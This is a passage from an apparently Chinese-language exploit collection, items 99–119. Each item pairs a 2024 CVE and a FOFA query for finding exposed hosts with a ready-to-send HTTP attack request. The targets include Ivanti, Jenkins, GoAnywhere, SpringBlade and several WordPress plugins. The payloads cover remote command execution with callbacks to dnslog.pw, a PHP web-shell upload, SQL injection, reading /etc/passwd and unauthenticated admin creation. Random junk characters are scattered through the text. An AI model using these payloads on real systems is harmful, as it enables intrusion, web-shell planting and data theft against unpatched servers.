: ]% F+ j# U+ [" r5 AContent-Type: application/x-www-form-urlencoded; charset=UTF-88 Y, t+ w- m3 Y) W: \, m$ ^
X-Requested-With: XMLHttpRequest& `* I/ s% {0 k# ^3 t# S$ C
- W$ b, j! B# e: X" z, a1 H& B9 d4 `id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B4 w7 K( G# `" F0 F* z' s
3 d7 Q0 ~4 V& H# I1 S9 N
# |: j# p. o0 k- K4 Q99. Ncast盈可视高清智能录播系统busiFacade RCE) Z- [( i0 ^1 X& e& ^/ a/ [
CVE-2024-0305% |9 [" j$ w( C+ y1 Z
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
: F% |, }3 I/ L$ K6 UPOST /classes/common/busiFacade.php HTTP/1.1$ {, W2 j: d, V
Host: 192.168.40.130:80804 s* o# t' W! l2 C9 n4 I" \1 S' G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% o* G1 T8 O7 d- E+ iConnection: close
) d" s7 q h2 UContent-Length: 154, z+ B) z3 P% \/ g
Accept: */*
4 o& Z4 T0 m, y3 J( l8 Z9 d) GAccept-Encoding: gzip, deflate
* r5 e5 u" V5 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 T3 Q# b C# L# cContent-Type: application/x-www-form-urlencoded; charset=UTF-8, p; v3 L' B) i( K' K! ]! i# ~
X-Requested-With: XMLHttpRequest
* m: C- e1 |; |! M6 |
( z% ^1 S, u/ q- h6 z%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D: J- _( S5 g/ k
5 ]9 U5 {- H0 v- L; r5 ~: U+ `+ b
# ]$ N+ [( q4 I/ I8 V100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" l4 \+ ^5 T* B3 y# b1 {4 |$ VCVE-2024-0352( ?, ~$ c7 I1 E6 }6 V
FOFA:icon_hash="874152924"$ P" u; G7 J/ A. [' }; b
POST /api/file/formimage HTTP/1.1
( w3 S# J3 _& R2 c6 Y4 @Host: 192.168.40.130
( F' e. l+ u9 R7 s9 ?' H$ i8 y; IUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
) |" m& I- ^. PConnection: close
, N% g! i% q# V: LContent-Length: 201, P& j3 R9 N4 Z, {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
3 d( G/ w+ I4 C8 H7 yAccept-Encoding: gzip
. |- g6 d+ u6 c/ O L
. M8 z& J8 j6 ~# t) f------WebKitFormBoundarygcflwtei* K! Y# L9 {9 O+ ?
Content-Disposition: form-data; name="file";filename="IE4MGP.php"& q* ~$ X. i! h. m( ?4 w/ g0 B
Content-Type: application/x-php) d) t4 v& b& j1 b6 T* b
2 E1 a# Z" y2 d- s8 v
2ayyhRXiAsKXL8olvF5s4qqyI2O
- J3 C4 M+ V" D$ i8 B" [------WebKitFormBoundarygcflwtei--
( W* h# T% p/ r7 @( G: Z! F' G
/ }1 j; Z4 D7 C; ~1 w8 ~% ~3 ^9 Z
101. ivanti policy secure-22.6命令注入7 |7 S0 r3 o. F+ n2 o. x1 O
CVE-2024-218871 b+ s) r) h/ |# H9 R8 |
FOFA:body="welcome.cgi?p=logo". }, T- |2 ^; ~ {2 k( s1 o
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
8 t" \7 ]2 ?- o9 g6 Z2 |, F* SHost: x.x.x.xx.x.x.x, [5 e+ i5 v. q* G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. [* G# ~. o0 E; n8 }Connection: close4 X P! p) B4 U/ Q2 g7 u
Accept-Encoding: gzip3 C5 Z: k( o6 z% }* ]7 S
. m: t' t; @$ r6 k& ?9 A
0 I$ _8 A2 t- Y( h102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行0 A K- i% G% `- H& k3 i
CVE-2024-21893; g7 S- R2 l" e) Q. N: \5 T, B. I
FOFA:body="welcome.cgi?p=logo", B: \; t2 D3 o f7 J
POST /dana-ws/saml20.ws HTTP/1.1( C) a8 }4 {; c
Host: x.x.x.x$ |: |( R3 Z7 t K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 [# q! ~( _) e) ]9 P2 PConnection: close7 `# v* K( q Z( j* U+ y8 P
Content-Length: 792
8 e: o0 D6 B Q6 U5 D4 d0 l; [Accept-Encoding: gzip
, L5 D4 y0 t- N* x
. V" X5 S- o8 a& {2 _<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
8 R9 B0 C6 N6 C% s E) Z
' p- Y$ l: j! D+ d+ ^103. Ivanti Pulse Connect Secure VPN XXE
: k' v. M# k9 y# c, Q$ P$ v u' E5 |CVE-2024-22024' k" w6 J% q7 h7 \; G* C
FOFA:body="welcome.cgi?p=logo"% k3 |2 k1 }1 W3 R7 t5 W
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
2 i, ~! M+ Q9 E7 @$ r: YHost: 192.168.40.130:111
+ ^" Z* Q# o( ]3 y3 H6 K: yUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36& I4 Z6 O" g( m( u! u, K
Connection: close, k# ^* Y9 X1 h+ p
Content-Length: 204
2 H* B0 R# Y1 N- q( V/ M: ~Content-Type: application/x-www-form-urlencoded* O& X$ D+ ?" ~
Accept-Encoding: gzip. _# P2 i" Z* P, K; ] h& Z
, H6 ~( u' ?2 T; m
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
0 [8 M1 r; N. X3 i$ Y1 Q; U/ i7 b1 c
. r9 a7 P2 Z$ E. B7 e1 ^- t
/ h3 o8 s" v6 v" I- ~其中SAMLRequest的值是xml文件内容的base64值,xml文件如下+ A2 S3 ]* N s. w" I. @4 M$ i
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
. p+ S+ N" x* g, ~* i: B- }3 ^$ k' U
: a! y. O# G* P8 B
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: k t1 F p( Z9 V% oCVE-2024-05698 a* ^3 a J- G1 m$ n
FOFA:title="TOTOLINK"
5 q1 n9 r% B: x% s l8 \! HPOST /cgi-bin/cstecgi.cgi HTTP/1.1
+ A+ c" `2 \/ I% ^! N+ }Host:192.168.0.1
- R5 ^" M4 B9 e* `: }Content-Length:41
# E8 Q0 B* F0 E1 Q6 x/ r# sAccept:application/json,text/javascript,*/*;q=0.01 Q9 m) X d2 t- f( {% U" j8 u9 c8 E
X-Requested-with: XMLHttpRequest
) X$ |6 h4 p8 s- wUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36! _' @; }( }; e1 ^! _; a% @( y
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
8 k/ A, G# o1 KOrigin: http://192.168.0.1
$ D8 w4 s. m5 F7 n6 \Referer: http://192.168.0.1/advance/index.html?time=1671152380564
9 K$ f v8 z) h5 ]* @Accept-Encoding:gzip,deflate
8 }% m" R- D9 N6 RAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7: Z9 z( m `) N' f: R+ o- v, h
Connection:close
4 G5 V$ a0 ~5 x+ k7 L8 e" E
! {6 |# l& k A1 X$ t{
- O/ Y9 [$ x3 P1 u) |# o$ p, h"topicurl":"getSysStatusCfg",
" c% ~. T2 b* f/ m9 b8 B"token":""
& Q& r( A' I4 v( u}
) u0 a0 W' g2 }& E$ J0 n6 u4 x/ B" ?) \9 S
105. SpringBlade v3.2.0 export-user SQL 注入
C6 G, u n( tFOFA:body="https://bladex.vip"
% M$ _" B- j' J/ k# Phttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
# O+ ~; R- E6 k: ^9 F; X+ V) L/ ?9 M
106. SpringBlade dict-biz/list SQL 注入
/ [8 ^5 }9 S; P( `& A: ~* U, g6 yFOFA:body="Saber 将不能正常工作"0 H1 O- o5 U G
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
3 I5 Z* k0 N$ I9 _& l0 LHost: your-ip
. O+ x# H% u; I- R; Y+ f$ I) pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' f0 a2 U7 s# U: d: G/ F% nBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
" Y' H# J0 c* @4 \' |" a8 iAccept-Encoding: gzip, deflate8 L b% b8 n/ a! i$ y3 }% p O4 \
Accept-Language: zh-CN,zh;q=0.95 j0 N' H( w9 u" q5 O# {+ o& i
Connection: close
& V2 j; U4 @, R+ R# h1 ^
$ N9 Q, Z3 Z# b+ A: {6 X6 _/ V; k# k+ `$ S3 `! ]# v+ V
107. SpringBlade tenant/list SQL 注入+ S/ `# h; @" E( E) ^
FOFA:body="https://bladex.vip"8 N' ]4 C) Q- b' i) r3 ^9 m1 W
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.17 M; ]1 Z) K) j7 q. ]( Y$ H
Host: your-ip& W$ M. P& M/ u: A; b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, [& x* g. j8 u& C2 v+ CBlade-Auth:替换为自己的& t9 r+ Y* C0 |9 E7 E5 a! F
Connection: close- v* Q" e5 h6 O( i* k: Y9 w! d1 T
; |! J8 Q, N6 v S+ |0 t$ O! \3 X/ s3 B4 {) d( x# ` z
108. D-Tale 3.9.0 SSRF. [& v& M5 a; n( |3 Y3 n5 A7 u2 r
CVE-2024-21642* L# v7 t6 v6 c! N0 s1 V
FOFA:"dtale/static/images/favicon.png"
! g7 _* v/ X2 k% B: [$ c1 _GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1& P+ `: C2 p2 \" c" c
Host: your-ip; @: B6 i; K! j$ I0 ^. ]* c
Accept: application/json, text/plain, */*
2 x" z+ Y( z+ ^+ M9 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) \% K" }, J) M! p( m) [( V8 tAccept-Encoding: gzip, deflate2 O9 i" d6 p: w( a
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8# y( z/ G, T4 q! ^% D
Connection: close
' X/ J! U4 c- J
6 I2 m' R+ r, H6 y; C
# W {& v% ]9 _7 N0 r109. Jenkins CLI 任意文件读取
& z1 j( I) G0 _) a$ t- ICVE-2024-23897
/ ]7 B) {7 P& ]! ?/ TFOFA:header="X-Jenkins". _7 `' d+ _4 e. j
POST /cli?remoting=false HTTP/1.1- a: m" w2 k/ f! D9 \
Host:* i1 ~6 k) A1 G8 n
Content-type: application/octet-stream& b4 \# ]% F1 s
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e923 U, z% x! d- \
Side: upload- d+ P5 x5 Z1 R/ x+ j+ r
Connection: keep-alive( I! o8 r$ Z: C+ U+ G* M2 D6 l( D
Content-Length: 163
6 v% B+ ?0 d: a) N# X' e" e1 D2 T
7 s" J9 S5 o; \b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
/ Q+ ]0 A+ c: R+ r# J5 O- `7 A! X
% V# J+ |" i" v
POST /cli?remoting=false HTTP/1.1
% v0 g! \7 c* U/ x: BHost:; [( V' ~8 t6 J8 r
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92: i. y' L+ M; j& I+ `0 ?
download6 G# a- w/ V; Y$ J; J
Content-Type: application/x-www-form-urlencoded: h9 p5 U7 s* W4 r6 L
Content-Length: 0
( w! Q% F" W9 C6 c! V) n; [4 R6 W, a& W6 g1 t4 ~+ t
/ u$ o3 O6 U$ a
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
3 j! H" ~, f2 ^1 Ujava -jar jenkins-cli.jar help% v) K1 w. f, J+ l
[COMMAND]# K2 R* L9 X8 Z) z
Lists all the available commands or a detailed description of single command.( x' U3 e' E0 r' {( |. [, a# x1 Y
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
2 |8 B5 J& d1 P4 @) Q4 t1 F7 e4 r1 K) ?; O; N4 [; ?/ l
$ w7 q$ V6 c& l* \9 i7 _% ^110. Goanywhere MFT 未授权创建管理员
5 |& b9 h. q2 J |CVE-2024-0204/ v' U3 K q+ P) M
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"& o2 B4 y0 L s" A. y
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.19 P9 N+ A' g( H8 [. F
Host: 192.168.40.130:80002 g( q: k6 r! l0 w3 n6 `( N5 w
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36! t/ V x; l1 `. u t a/ t
Connection: close
1 i2 O5 z0 ^9 `Accept: */*# M/ [! r# b9 d6 s O
Accept-Language: en
7 t4 W7 s& u, s' E! ^# AAccept-Encoding: gzip& t: h1 t8 ~, p7 J* y& [8 O1 _7 q
( @3 q1 \; ~, U9 }* Z1 u
1 H$ P2 K6 E: G7 I111. WordPress Plugin HTML5 Video Player SQL注入
1 u5 Y1 O' \8 Q1 SCVE-2024-1061/ q1 Z& O7 K- o% U# O* _
FOFA:"wordpress" && body="html5-video-player"8 L% c0 f2 N* F! w3 i1 a
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1( `* S P, B$ ?8 P
Host: 192.168.40.130:1128 e" h, L+ q8 ?; Z( _ n& X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36: j5 }' ]+ `4 C5 J( C3 k
Connection: close' t) X7 d, I I) P X
Accept: */*
; ~+ Q$ ]5 w2 l( ]; L; | LAccept-Language: en
4 T- \" B, n& w" YAccept-Encoding: gzip
% _" \& m0 _8 K9 D
. a* x" W+ w2 ]2 t8 B' n1 W2 w
112. WordPress Plugin NotificationX SQL 注入2 M9 f% T I; n/ ~8 \5 F9 m
CVE-2024-1698
' Z2 ?% ?3 _0 L# @& T+ ?2 gFOFA:body="/wp-content/plugins/notificationx"
. z1 Y1 w6 v8 E# m8 X' I, ~( SPOST /wp-json/notificationx/v1/analytics HTTP/1.18 S- X9 R1 r& m# P4 l' u v* r3 {
Host: {{Hostname}}) f8 n2 \$ X8 a! [
Content-Type: application/json
* w. @& r2 l2 g H6 T3 U8 V6 P( w5 A8 n7 \2 W
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}) j8 M, c' i( B
; Z! F% C6 G) Q" P7 f% B
/ P. v/ Y7 D$ D, N5 ]113. WordPress Automatic 插件任意文件下载和SSRF1 [6 U3 ?! K5 x+ m- r( t
CVE-2024-27954
3 ^$ l) i) k+ ?0 GFOFA:"/wp-content/plugins/wp-automatic"- v! V1 h- a; k/ D; E' f
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
, e. B2 O* k$ u7 ?. AHost: x.x.x.x+ t$ v/ R }' B0 M) P
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
* U# ?+ b+ ^2 R9 D! M( [Connection: close' i; y4 a& z+ H! ]
Accept: */*
9 ~9 w, }$ \0 G7 v# q( _# ^) k3 ZAccept-Language: en
# e+ w. X2 n( V* \5 n' O2 mAccept-Encoding: gzip
$ v& N+ w5 ?! h# g+ A! r' Q' b% Y6 e; Z1 c" o
. Q" z3 n- P" d9 E$ K# M- B, T
114. WordPress MasterStudy LMS插件 SQL注入
& @$ `5 M: n& f3 Q* K( TFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"6 z ?. E+ w! Q" Y' A
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
' h; A, ?3 u+ t( h) G# rHost: your-ip+ r8 g4 V1 Z0 m- E' Y3 K
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ }6 {6 x F2 `. [2 y0 f! b1 iAccept-Charset: utf-8" y1 s5 h0 A4 S
Accept-Encoding: gzip, deflate
" m3 f6 P0 b9 A% P7 u8 r, O& bConnection: close
9 B1 S! T8 }% h. {1 F3 u ~
% p! I+ ?3 X& c" Q1 I( U* n! O( g, i6 U$ X% T8 x" e) ^' Y
115. WordPress Bricks Builder <= 1.9.6 RCE
+ c0 ~: r4 p S' M/ B4 R+ O* eCVE-2024-25600 H O0 {3 `% l3 M p Z
FOFA: body="/wp-content/themes/bricks/"
2 e( m" B3 }' d* o第一步,获取网站的nonce值
! @% z& S# d4 q; q8 j I0 u$ ]GET / HTTP/1.1
' L. Y; [( U! q+ HHost: x.x.x.x4 J6 \3 j' x) k' X
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; C |* s- V: Z& mConnection: close9 z! L$ L3 H8 G6 s; i
Accept-Encoding: gzip. s5 J+ s$ h4 a/ s
5 h+ F% F, Y1 N3 @( C+ J+ H" ]: T- _- N
第二步替换nonce值,执行命令1 V9 @- k0 p4 Y9 l3 |
POST /wp-json/bricks/v1/render_element HTTP/1.1
, V% n( A! l- V, q% v/ ^Host: x.x.x.x* U3 G# y; ^# n9 c' H2 ?) M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) h9 l6 N% p" n% n
Connection: close/ _: ~5 j/ }2 s8 V" }8 w2 ^5 z# G
Content-Length: 356
9 F4 i* B( s- b: X0 b7 hContent-Type: application/json0 j* s( R$ V+ V! y$ b
Accept-Encoding: gzip
& X+ v! C, @" v% Z
9 v6 R# W- W) f( @ [$ n{
* d! H/ q3 x. l9 ^8 C6 O- i2 x& r"postId": "1",
7 J8 s. d0 u) e, }/ n "nonce": "第一步获得的值",
3 z9 C9 u: ~% ~* K4 T "element": {1 \5 J+ x8 G: N- ?5 t4 Z( E" q
"name": "container",
' g1 ?5 P) A, h* J1 j' T "settings": { O$ X; V2 J* }% \' `8 U
"hasLoop": "true",) }7 O6 U( b- r# L
"query": {
% \( V$ [1 n3 L5 g "useQueryEditor": true,
4 P1 O. |2 A0 ]# S: k "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
& H; Z7 h7 z# P% S0 N "objectType": "post"
6 U% J* s- H9 K8 j }1 Q* H- ^8 B0 C) D2 S4 p
}
! e$ [( F& [* t* I% j( {' Q9 C }
4 K: w4 j! K1 w* |/ b! c}
" c/ u: P/ J* b, v* X" V I: g; D; M0 N9 e
( m* [) n: I6 k, D( I1 c0 ~" Z8 P8 I116. wordpress js-support-ticket文件上传
* X$ q4 I) i; r# MFOFA:body="wp-content/plugins/js-support-ticket"
}+ v, E3 l" E, H2 r; jPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1/ d n- G' E |, a, E* Q
Host:2 Y5 w: ~1 |% ?: y7 e
Content-Type: multipart/form-data; boundary=--------767099171
( N1 N1 Q5 B0 e- h* H( n) |% K% fUser-Agent: Mozilla/5.0
* h! \- {' R$ I' `6 `2 m
7 C) _- o" F8 g$ {----------767099171
y8 U0 g) Z* x9 n7 t, [Content-Disposition: form-data; name="action"
0 J! J+ f0 j8 a7 n* P vconfiguration_saveconfiguration
- R3 _8 M2 [+ u, O----------767099171. z/ M3 x _+ Q" B. U- N! P0 p) H
Content-Disposition: form-data; name="form_request"
( b0 H) R* {' `$ [jssupportticket7 ?; U! N3 D, S/ d
----------7670991718 Z! M3 G: ~; a! I! \
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"7 d$ H* l2 W: W$ G
Content-Type: image/png. C4 `3 R. O" y! n) B
----------767099171--
4 k+ f# K8 |5 @. o% P8 q2 _& k2 ?" g. g. R! r( C
; P5 y1 d, c3 J$ C- O& j
117. WordPress LayerSlider插件SQL注入4 `$ o& A9 ^+ U/ v: t" H; P
version:7.9.11 – 7.10.0% V5 |% k, F- [9 f* Q" V
FOFA:body="/wp-content/plugins/LayerSlider/"
6 k, v6 p6 g/ J1 p' t; ~GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
* ^ D3 S, m) v" O0 N5 y5 N' X2 q+ ?1 RHost: your-ip' ]4 A6 l/ j# }. I; o! o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, a/ Y. j9 q( j8 p: A' R! k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% f. U# y$ ~* H3 E6 K# x* xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ j; B% M- \ J' D
Accept-Encoding: gzip, deflate, br F2 Y( _/ n2 H# T
Connection: close0 h: I1 `+ {4 b+ c0 q
Upgrade-Insecure-Requests: 1
2 v. W% @5 w) A% E
& X2 O9 ]3 B1 P ~" D
0 @( P k3 e+ E A118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
/ y2 A, u2 D3 j- r, L. h: QCVE-2024-09395 ]. ^# c3 K2 w3 G! {9 y! F: y9 h
FOFA:title="Smart管理平台"& Z v5 p% M: P3 p6 a5 T
POST /Tool/uploadfile.php? HTTP/1.11 l7 c( m3 c" v0 r9 e/ V
Host: 192.168.40.130:84434 q7 ]: \6 C, o" h) H! X
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
! e$ U; G" H4 q6 y! KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
' {3 y: m4 o, u# D6 f# cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) h/ ]7 g9 z: C+ ]& W5 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% _. { z0 r# h7 U/ jAccept-Encoding: gzip, deflate
( |" f# j! l4 M$ I# W8 C9 W8 yContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887# h# l' q6 ~8 @1 z
Content-Length: 4053 w/ i" T% p6 |8 Z: o- T
Origin: https://192.168.40.130:8443/ H8 ^4 K) b. F% T
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
! z+ x2 n; p% t& Q! t8 P5 e. QUpgrade-Insecure-Requests: 1
$ i1 l( @# k( B0 uSec-Fetch-Dest: document4 x* b; n* a7 `6 E: C, h
Sec-Fetch-Mode: navigate
5 c9 ?! c3 v0 A3 ^- y! q8 ]Sec-Fetch-Site: same-origin/ w2 |% U- O, X$ @5 z0 W0 S
Sec-Fetch-User: ?1
, l$ L, V a/ }5 W9 tTe: trailers
6 ?0 z6 m' s3 yConnection: close$ I# Q* w+ B- {7 L" I. ^6 ]5 Z
$ b: X$ h: O+ G, X9 m
-----------------------------13979701222747646634037182887* W3 N, H! j% Q! I+ `! h
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
$ ? [7 q% Q$ n* |2 lContent-Type: application/octet-stream
: @, |/ f) K% H, h/ D, G' a
: W; T3 | N. a5 l9 p9 q0 l<?php
4 T1 O: h+ G7 O! v# Bsystem($_POST["passwd"]);
5 F2 m: T- n3 h1 r?>- V3 s8 }/ p/ G% z, n- @
-----------------------------13979701222747646634037182887/ w* Y; z6 } z: C
Content-Disposition: form-data; name="txt_path"/ D2 ^' g' g! @; e' G8 V
; ?" b0 m( K, `* i5 o/home/src.php6 e% [' Z) Z K" m) w
-----------------------------13979701222747646634037182887--
& _8 [+ j$ R3 U# l7 U' e; e& x n, ?% D4 u0 c' \
2 D0 ?; {( V2 R9 q |# X
访问/home/src.php
( q2 _; ?9 E$ l( y& n( ^
; u5 o* ?3 l- M- p" e119. 北京百绰智能S20后台sysmanageajax.php sql注入
: g9 w, P: I* uCVE-2024-1254
# `- ? _- }" r. x/ N" X( u% p+ o8 Y8 ]FOFA:title="Smart管理平台") f% z4 x+ w# O1 x
先登录进入系统,默认账号密码为admin/admin* H; p& @; [5 n, U0 M$ [& I
POST /sysmanage/sysmanageajax.php HTTP/1.11
, {9 Z8 P8 A7 d& fHost: x.x.x.x6 L# f. I" o8 C6 I: ]
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee# D8 e& x" |; ^: e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
- j8 t. Q0 i8 Y" z8 N6 `: KAccept: */*, \' w& G1 P0 X' b5 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- J" d7 r, \$ ]. p
Accept-Encoding: gzip, deflate
. V5 {; D, Y4 x$ i% S7 j! ?* }Content-Type: application/x-www-form-urlencoded;
5 Y* c! H( U5 p: p) j3 PContent-Length: 109; L! a5 w( |* }7 H) Y
Origin: https://58.18.133.60:8443
% {6 o B2 v" ?# bReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php2 v3 v2 H/ [6 X3 Z3 ]+ G. _
Sec-Fetch-Dest: empty
4 t3 @7 F; K: L7 ?6 _6 z1 _7 rSec-Fetch-Mode: cors3 |, o$ R+ P; \$ ]. g
Sec-Fetch-Site: same-origin
% ]' ~! D1 ^7 p* l5 DX-Forwarded-For: 1.1.1.16 n2 m' \1 Y1 @: y7 K; B
X-Originating-Ip: 1.1.1.1
# s' x3 C- b0 m3 TX-Remote-Ip: 1.1.1.1
6 @. ^& k1 u! _9 h9 S* R& @, }. rX-Remote-Addr: 1.1.1.1) \9 k; p" B) E: W7 a3 w' y
Te: trailers
6 m' |" b2 @, Y2 NConnection: close' b& _+ m$ p$ Q% J2 e" b# H
